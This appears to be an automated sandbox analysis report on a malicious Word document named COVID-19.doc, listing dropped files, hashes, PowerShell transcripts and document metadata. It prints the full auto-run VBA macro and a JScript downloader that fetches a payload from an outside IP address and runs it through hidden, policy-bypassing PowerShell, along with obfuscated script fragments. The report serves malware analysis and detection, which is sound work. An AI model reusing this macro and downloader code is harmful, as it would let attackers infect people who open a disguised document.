                  SSDEEP:12:eUvDzr8ie/B8dN1T02PWXO6qL1HdR5ehLUM17TA1QT8AdLOG9qrCNZ:eUz8iei9TXPFV5etxECNZ
                  MD5:60E18CC07D242AC01E5FAD4DA1ED807E
                  SHA1:EF94BD6B268B65AB69D06F48E4A2CA93F15D7064
                  SHA-256:6966E4044E6F9C236E47A7E74586B83C0E6DE0C9DA955B74342F5506B63A85C4
                  SHA-512:793C5F03E853D7C8BC9A6FA4C98353E57D9D30F8B1D34AF0BAA3A76BE33A720A07C2E55FC6722BCB63950AC677DA76CCE469193C70BCDB05C6969DECC4A2A2E6
                  Malicious:true
                  Preview: var o = WScript.CreateObject("MSXML2.XMLHTTP");..var ps = 'C:\\Users\\user\\Desktop\\COVID-19.ps1'..while (true) {.. o.Open('GET','http://78.141.194.181/d569872345345.txt',0);.. o.Send();.. if (o.Status==200) {.. var so = new ActiveXObject('Scripting.FileSystemObject');.. var fo = so.CreateTextFile(ps, true, true);.. fo.WriteLine(o.responseText);.. fo.Close();.. var c = 'powershell -ex bypass -win hid -f ' + ps;.. (new ActiveXObject("WScript.Shell")).Run(c, 0);.. WScript.Quit();.. }..}..
                  C:\Users\user\Desktop\~$VID-19.doc
                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):162
                  Entropy (8bit):2.3263314982102843
                  Encrypted:false
                  SSDEEP:3:Rl/Zdb+R2dt/9NiPD/t/9RCcFn:RtZZ+R6tiPNCcF
                  MD5:92949F7D3AD02CEF6406FEEA6907032B
                  SHA1:7CB09B75A019A8C6F2DB7BB8589389C7C234C317
                  SHA-256:40AB3ECE8C92A0D0D6C4845FCCDD17E33A3670D1B64606B46229CAB81962C1F5
                  SHA-512:5807747F670D2CE4FAAFB0A4DE76427848FF318DAAF6D0A07FD613DFE315B598F0B17EE6D4461860A603A4260B5C6266AEDA0010C02BE6D5125E7CB764D9D685
                  Malicious:false
                  Preview: .pratesh................................................p.r.a.t.e.s.h..........8.B............................<.2.............................0........j........
                  C:\Users\user\Documents\20210120\PowerShell_transcript.648351.BCz0DRM3.20210120103110.txt
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1393
                  Entropy (8bit):5.282987417959853
                  Encrypted:false
                  SSDEEP:24:BxSAOC7vBZFx2DOXUWEAOouW6HjeTKKjX4CIym1ZJX2zze62WX+DsV77PAGTbw32:BZRvjFoOkDq6qDYB1ZWze6NqsdU82ZZa
                  MD5:6866D6EE7B30ACF174EF1852E58A52F4
                  SHA1:1268DB2A4B7FDB3E4CEAADBAD8A2CAEF1D785793
                  SHA-256:EB00C7C901FE249A2829F373E5268FC67BC404C28518AF3567C2339145176AE0
                  SHA-512:07298AB4C3A5E533AF83AAD40ABC3D731B6A92C6850A4A72019E038B742E0FF5F924D956B790E8BA9D1F8BA883BCEE0110AD7E6809D71A9BF392BD675A36162A
                  Malicious:false
                  Yara Hits:
                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\Users\user\Documents\20210120\PowerShell_transcript.648351.BCz0DRM3.20210120103110.txt, Author: Florian Roth
                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210120103122..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 648351 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File C:\Users\user\Desktop\COVID-19.ps1 -adminRights 1..Process ID: 5108..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210120103125..**********************..PS>CommandInvocation(COVID-19.ps1): "COVID-19.ps1"..>> ParameterBinding(COVID-19.ps1): name="adminRights"; value="1"..[SC] OpenService FAILED 1060:....The specified service does
                  C:\Users\user\Documents\20210120\PowerShell_transcript.648351.wAzWoynL.20210120103050.txt
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1076
                  Entropy (8bit):5.180808759433156
                  Encrypted:false
                  SSDEEP:24:BxSAOK7vBZFx2DOXUWGOBWGHjeTKKjX4CIym1ZJX2Yze62WM+NnxSAZ6s3C:BZVvjFoO1gGqDYB1ZVze6NMaZZV3C
                  MD5:1E80315542C114FCFEFE7FE8833E241E
                  SHA1:E536AAA3EC433F215547B73823826C775C71D2FE
                  SHA-256:9462FE15B79845A7EFE540A6CDC8AD4E0FFADDCFA47AF299CC3A700E90D1F2CF
                  SHA-512:E2791604DD66D8F498516CC856C41DFB928FADEFDDBEA48CDA7856B7113E61AA3FDA40514963D19ECFA9B7ED5CABB81530341E3A9E2EFA11DCF0AD5511AA4097
                  Malicious:false
                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210120103100..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 648351 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ex bypass -win hid -f C:\Users\user\Desktop\COVID-19.ps1..Process ID: 2804..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210120103102..**********************..PS>CommandInvocation(COVID-19.ps1): "COVID-19.ps1"..>> ParameterBinding(COVID-19.ps1): name="adminRights"; value="0"..**********************..Command start time: 20210120103414..**********************..PS>$global:?..True..**********************..Windows P
                  C:\Windows\SysWOW64\20210120\PowerShell_transcript.648351.s_LwcT35.20210120103152.txt
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1039
                  Entropy (8bit):5.162320619250201
                  Encrypted:false
                  SSDEEP:24:BxSAO6qPvNFx2DOXU4YfWAHjeTKKjX4CIym1ZJX2qYJRnxSAZ6mC:BZWvNFoOrAqDYB1ZDSZZnC
                  MD5:CA1B2EDF22BDBADE531793B7901294B0
                  SHA1:6DB3F1389DFDBAB6F97B1A28C72D58936B2F80AF
                  SHA-256:C06F2B700277B9D99C57D72480DE1FC534293FA10797C12DA911996EFD236569
                  SHA-512:8852E1814E8A49AE404E8BCEEEAB97FC64F78FB2EC1757AA627D2759CF32CB43D976B5BF95A018C4BE6574B973F786599CDFDB343468702682AB06BCC1FFF549
                  Malicious:false
                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210120103200..Username: WORKGROUP\SYSTEM..RunAs User: WORKGROUP\SYSTEM..Configuration Name: ..Machine: 648351 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1..Process ID: 5656..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210120103203..**********************..PS>CommandInvocation(rhedxdcy.z3u.ps1): "rhedxdcy.z3u.ps1"..**********************..Command start time: 20210120103533..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 2
                  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\BIT36CF.tmp
                  Process:C:\Windows\System32\svchost.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):76082
                  Entropy (8bit):5.580063013682857
                  Encrypted:false
                  SSDEEP:1536:EAdEbt2aF+ZjZT1ZJem9ZBMXbb5mumoHCcNl42SeZ:EAdEbt2LTl9zMrVZmotGY
                  MD5:C2A40C323A4C4083AF3246E16C4C1D26
                  SHA1:80DB1FDAEA9DBB49C718045F09AC114BFEC315F7
                  SHA-256:0BF80B6455609CF0DC13BAC5B4ED24766BBE2D04F86023930C367736EA76D91E
                  SHA-512:35BF1E2D7D037C0CB738A031169B199321AECB358DC53AD1DC6F4452E8BA97FEE502D5F3B42AFAE8575D76A7CB2312DB8019AA7AF89DBB91270B7A4A3370F98A
                  Malicious:false
                  Preview: Set-StrictMode -Version 2.function sIZU.{.$BiYK=JqKKPZ '7'.$BiYK.}.function dDJBY.{.$VpsSYb=AxKemD A v h e T U T I.$Mm5mIV=oXkeJ F c '2' q.$L2tm62=AUvxo q + O t C 9 U y W.$L2tm62+$VpsSYb+$Mm5mIV.}.function QAQA.{.Param ($wL8zIF,$QfM,$uyg1,$zmx,$fRLNeS,$TEVz).$wL8zIF+$uyg1+$fRLNeS+$zmx+$TEVz+$QfM.}.function xNkqnI.{.$Qlw=ESYcq q U c.$JTQ=idmw A e U c l Z D A X P /.$Kqeauh=FvAWc I W C T.$TxQjW=gwmyc U i 1 + O / z O f I.$GtK34=eYubG C m w j y w t z 2 W l p B I.$rJsrKM=ZyJLib S f E.$Ne5o=oYatS / Y W C X s T S u H f t 6.$pwNw8p=LohD V B K K R A a.$Ne5o+$TxQjW+$rJsrKM+$GtK34+$pwNw8p+$Kqeauh+$JTQ+$Qlw.}.function QuuQww.{.$fYmBp=oYatS l e l D d e c t e e R f e.$C6vy=ZyJLib a t g.$Z0pNv=JqKKPZ e.$fYmBp+$C6vy+$Z0pNv.}.function RjVr.{.$lihvwX=jZPPm c.$lihvwX.}.function zQgMfg.{.$GatrHx=lSxu Q b A A 6 i B 9 2.$lt1=dtUCnQ t J e o G m z.$FyS=JqKKPZ V.$FIA9=oXkeJ Q U g U.$FIA9+$lt1+$GatrHx+$FyS.}.function iWLvg.{.$V4IY=lSxu R S K H Z 8 G W 8.$KU936I=WIWQOu V P u f n s 2 k d d V B m y.$PoRDSf=ZyJLib u
                  C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):19068
                  Entropy (8bit):5.418353568002772
                  Encrypted:false
                  SSDEEP:384:JtysEnIVH09h60YeZSY4D3Zug832RGxfpOQnw/e1nsD1D:11YvYIpMZ5WfpOjm1nK
                  MD5:0F9A007664218141AA44F0EFF73D5F2F
                  SHA1:89EF73717C50EC3FBB06103FFD33D6E128BF4637
                  SHA-256:457E303D33E6BA88B856FF13FA4807802C5ABA1F5DBE5AE1D77DA54D69723E12
                  SHA-512:82D540E7DAD128BC5D0B04C44E9EA713647BAAAF09B8E7B35F86D73D9A4336DD86FA2BB164A354AE1B977F37A073EA77C05B6C96C0781C0EFB698A3C91881450
                  Malicious:false
                  Preview: @...e...........................................................H...............<@.^.L."My...:,..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<................):gK..G...$.1.q........System.Configuration<.................~.[L.D.Z.>..m.........System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                  C:\Windows\Temp\__PSScriptPolicyTest_jtn2f3ar.yfz.ps1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview: 1
                  C:\Windows\Temp\__PSScriptPolicyTest_ydow2vrz.d3l.psm1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview: 1

                  Static File Info

                  General

                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: -535, Author: , Template: Normal.dotm, Last Saved By: Windows User, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Total Editing Time: 05:57:00, Create Time/Date: Mon Jan 18 22:07:00 2021, Last Saved Time/Date: Tue Jan 19 18:30:00 2021, Number of Pages: 1, Number of Words: 0, Number of Characters: 2, Security: 0
                  Entropy (8bit):7.474426291744808
                  TrID:
                  • Microsoft Word document (32009/1) 79.99%
                  • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                  File name:COVID-19.doc
                  File size:409088
                  MD5:9f9f50f3c32ee660a8bbe6616dda8b34
                  SHA1:6c338a10e894bcad8c67e5da332a6cd7f75f35e0
                  SHA256:9d063fd60d7d0fb2d4d92f0f348bb2397cf80dd8a4fec5680647469b570f2afe
                  SHA512:bb447e4fc15c4b6186e6a7ad913b695a70e4392bb6e7ee5467831dd2b34db3a7256f927b54be555e148f5906fc41cf0c6fd887f86387cb29aacb6d568563c933
                  SSDEEP:6144:b4pXcA1eWEqP9w1n+DtGMYkvfFvOnOIl7eYoOcS/fj3zjNThY0pb:EWWeCYn+rNLIJ6VSHjN7N
                  File Content Preview:........................>......................................................................................................................................................................................................................................

                  File Icon

                  Icon Hash:74f4c4c6c1cac4d8

                  Static OLE Info

                  General

                  Document Type:OLE
                  Number of OLE Files:1

                  OLE File "COVID-19.doc"

                  Indicators

                  Has Summary Info:True
                  Application Name:Microsoft Office Word
                  Encrypted Document:False
                  Contains Word Document Stream:True
                  Contains Workbook/Book Stream:False
                  Contains PowerPoint Document Stream:False
                  Contains Visio Document Stream:False
                  Contains ObjectPool Stream:
                  Flash Objects Count:
                  Contains VBA Macros:True

                  Summary

                  Code Page:-535
                  Title:
                  Subject:
                  Author:
                  Keywords:
                  Comments:
                  Template:Normal.dotm
                  Last Saved By:Windows User
                  Revion Number:5
                  Total Edit Time:21420
                  Create Time:2021-01-18 22:07:00
                  Last Saved Time:2021-01-19 18:30:00
                  Number of Pages:1
                  Number of Words:0
                  Number of Characters:2
                  Creating Application:Microsoft Office Word
                  Security:0

                  Document Summary

                  Document Code Page:-535
                  Number of Lines:1
                  Number of Paragraphs:1
                  Thumbnail Scaling Desired:False
                  Company:
                  Contains Dirty Links:False
                  Shared Document:False
                  Changed Hyperlinks:False
                  Application Version:786432

                  Streams with VBA

                  VBA File Name: ThisDocument.cls, Stream Size: 2850
                  General
                  Stream Path:Macros/VBA/ThisDocument
                  VBA File Name:ThisDocument.cls
                  Stream Size:2850
                  Data ASCII:. . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . u Q R . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . k . . x . C . . . . . U h . . . . . . . . I . + . . W . . . . . . . . . . . . . . . . . . . . . . . ^ . . 0 R . . @ . . u . . . 6 p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:01 16 01 00 01 00 01 00 00 d6 05 00 00 e4 00 00 00 62 02 00 00 a0 07 00 00 dd 05 00 00 d9 08 00 00 00 00 00 00 01 00 00 00 75 51 52 d1 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 a4 04 6b 09 d4 78 ae 43 b0 e0 a9 ec 05 55 68 e2 14 d5 f5 1e c5 fd fa 49 83 2b 11 06 57 fb b9 d6 00 00 00 00 00 00 00 00 00 00 00 00 00

                  VBA Code Keywords

                  Keyword
                  Dir("x:\",
                  VB_Name
                  VB_Creatable
                  VB_Exposed
                  ActiveDocument.Path
                  Print
                  Until
                  Replace(f,
                  Replace(s,
                  "\\"))
                  "wscript
                  DateAdd("s",
                  VB_Customizable
                  /e:jscript
                  ".tmp"
                  DoEvents
                  ".doc",
                  Document_Open()
                  Output
                  VB_TemplateDerived
                  "ThisDocument"
                  "%%U%%",
                  False
                  Attribute
                  Replace(ActiveDocument.Name,
                  Shell
                  VB_PredeclaredId
                  VB_GlobalNameSpace
                  VB_Base
                  Close
                  "%%PS%%",
                  VBA Code
                  Attribute VB_Name = "ThisDocument"
                  Attribute VB_Base = "1Normal.ThisDocument"
                  Attribute VB_GlobalNameSpace = False
                  Attribute VB_Creatable = False
                  Attribute VB_PredeclaredId = True
                  Attribute VB_Exposed = True
                  Attribute VB_TemplateDerived = True
                  Attribute VB_Customizable = True
                  Sub Document_Open()
                      Dim s, f, c
                      If Dir("x:\", 31) = "" Then
                          f = ActiveDocument.Path + "\" + Replace(ActiveDocument.Name, ".doc", "")
                          s = Replace(UserForm1.Label1.Caption, "%%PS%%", Replace(f, "\", "\\"))
                          s = Replace(s, "%%U%%", "http://78.141.194.181/d569872345345.txt")
                          f = f + ".tmp"
                          Open f For Output As #19: Print #19, s: Close #19
                          c = "wscript /e:jscript " + f
                          Shell c, 0
                          et = DateAdd("s", 4, Now)
                          Do
                              DoEvents
                          Loop Until Now >= et
                          Kill f
                      End If
                  End Sub
                  VBA File Name: UserForm1.frm, Stream Size: 1618
                  General
                  Stream Path:Macros/VBA/UserForm1
                  VBA File Name:UserForm1.frm
                  Stream Size:1618
                  Data ASCII:. . . . . . . . . h . . . . . . . . . . . . . . . o . . . 7 . . . . . . . . . . . u Q z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] r U . . 0 J . . . . ; d S / . K . . f . ; G . . . . > . . . . . . . . . / I . g . . , U . . . . . . . . I . . G O E . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:01 16 01 00 00 00 01 00 00 68 04 00 00 e4 00 00 00 84 02 00 00 96 04 00 00 6f 04 00 00 37 05 00 00 02 00 00 00 01 00 00 00 75 51 7a 10 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 95 5d 72 55 2e 07 30 4a 89 ef 94 f9 3b 64 53 2f 8a 4b db ec 66 09 3b 47 80 f1 e1 af 3e 90 f3 1a 12 95 ca 01 04 a0 2f 49 8d 67 d5 1b 2c

                  VBA Code Keywords

                  Keyword
                  False
                  Private
                  VB_Exposed
                  Attribute
                  VB_Name
                  VB_Creatable
                  VB_PredeclaredId
                  VB_GlobalNameSpace
                  VB_Base
                  VB_Customizable
                  VB_TemplateDerived
                  UserForm_Click()
                  VBA Code
                  Attribute VB_Name = "UserForm1"
                  Attribute VB_Base = "0{EEC403EE-FAB8-4A13-9155-CB1083A2327C}{01CA9512-A004-492F-8D67-D51B2C55D4A5}"
                  Attribute VB_GlobalNameSpace = False
                  Attribute VB_Creatable = False
                  Attribute VB_PredeclaredId = True
                  Attribute VB_Exposed = False
                  Attribute VB_TemplateDerived = False
                  Attribute VB_Customizable = False
                  Private Sub Label1_Click()
                  
                  End Sub
                  
                  Private Sub UserForm_Click()
                  
                  End Sub

                  Streams

                  Stream Path: \x1CompObj, File Type: data, Stream Size: 160
                  General
                  Stream Path:\x1CompObj
                  File Type:data
                  Stream Size:160
                  Entropy:3.99059075143
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q N . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . O . f . f . i . c . e . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 4e 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 4f 00 66 00 66 00 69 00 63 00 65 00 20 00 57 00
                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                  General
                  Stream Path:\x5DocumentSummaryInformation
                  File Type:data
                  Stream Size:4096
                  Entropy:0.303808718283
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 10 01 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                  General
                  Stream Path:\x5SummaryInformation
                  File Type:data
                  Stream Size:4096
                  Entropy:0.555003203852
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 8c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 d8 00 00 00 06 00 00 00 e4 00 00 00 07 00 00 00 f0 00 00 00 08 00 00 00 04 01 00 00 09 00 00 00 1c 01 00 00
                  Stream Path: 1Table, File Type: data, Stream Size: 6841
                  General
                  Stream Path:1Table
                  File Type:data
                  Stream Size:6841
                  Entropy:6.09008436485
                  Base64 Encoded:True
                  Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                  Data Raw:6a 04 0f 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                  Stream Path: Data, File Type: data, Stream Size: 371167
                  General
                  Stream Path:Data
                  File Type:data
                  Stream Size:371167
                  Entropy:7.61641986305
                  Base64 Encoded:True
                  Data ASCII:. . . . D . d . . . . . . . . . . . . . . . . . . . . . J 8 # & r . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . f . . . . . . . . . . . . . . . . . . . C . . . B . . . . A . . . . . . * . . . . . . . . . . . . . . . > . H . 8 . 1 . : . 0 . . 2 . > . @ . 4 . . = . 0 . . C . : . @ . . 2 . . . . . . . . . . . . . . . R . . . % . . . . . . . . . f . . . . y . s ) . . . . . . . . . . . . . D . . . . . 5 . . F . . . . . . . . . . f . . . . y . s ) . . . . . . . . . ) E x i
                  Data Raw:df a9 05 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 4a 38 23 26 72 02 72 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 66 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 42 00 00 00 04 41 01 00 00 00 05 c1 2a 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 3e 04 48 04
                  Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 484
                  General
                  Stream Path:Macros/PROJECT
                  File Type:ASCII text, with CRLF line terminators
                  Stream Size:484
                  Entropy:5.38554759732
                  Base64 Encoded:True
                  Data ASCII:I D = " { 9 B A 0 8 4 6 4 - 8 5 7 B - 4 7 4 4 - 9 0 8 F - D 1 F F F 6 1 F F F A 1 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D B D 9 D B 5 1 6 7 5 5 6 7 5 5 6 7 5 5 6 7 5 5 " . . D P B = " 6 3 6
                  Data Raw:49 44 3d 22 7b 39 42 41 30 38 34 36 34 2d 38 35 37 42 2d 34 37 34 34 2d 39 30 38 46 2d 44 31 46 46 46 36 31 46 46 46 41 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d 0a 42
                  Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 71
                  General
                  Stream Path:Macros/PROJECTwm
                  File Type:data
                  Stream Size:71
                  Entropy:3.29226192431
                  Base64 Encoded:False
                  Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . .
